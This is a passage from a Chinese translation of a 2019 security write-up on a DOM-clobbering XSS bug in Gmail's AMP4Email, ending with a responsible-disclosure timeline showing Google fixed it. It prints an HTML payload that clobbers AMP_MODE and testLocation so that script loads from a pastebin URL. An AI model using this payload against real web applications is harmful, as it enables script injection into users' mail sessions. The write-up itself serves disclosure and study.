Gmail中AMP4Email所导致的XSS漏洞( 三 )

还记得之前的window.test1.test2么,我们只需做相同的事,覆盖window.testLocation.protocol:
<!-- We need to make AMP_MODE.localDev and AMP_MODE.test truthy--><a id="AMP_MODE"></a><a id="AMP_MODE" name="localDev"></a><a id="AMP_MODE" name="test"></a><!-- window.testLocation.protocol is a ba se for the URL --><a id="testLocation"></a><a id="testLocation" name="protocol"href=https://www.isolves.com/it/aq/wl/2019-11-20/"https://pastebin.com/raw/0tn8z0rG#">不过在实际情况中,由于AMP中部署了Content-Security-Policy,因此代码并未执行:
Content-Security-Policy: default-src 'none'; script-src 'sha512-oQwIl...=='https://cdn.ampproject.org/rtv/https://cdn.ampproject.org/v0.jshttps://cdn.ampproject.org/v0/因此后来我又开始寻找绕过CSP的方法,当然也成功找到了:https://twitter.com/SecurityMB/status/1162690916722839552 。不过我发现2016年就有人发现了相同的方法 。
如果你想进一步进行学习,可以查看点击这里 。
时间线2019年8月15日–向google发送报告
2019年8月16日–得到响应
2019年9月10日–Google确认漏洞
2019年10月12日–Google确认漏洞已修复
2019年11月18日–详情公开
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://nosec.org/home/detail/3188.html
原文:https://research.securitum.com/xss-in-amp4email-dom-clobbering/




推荐阅读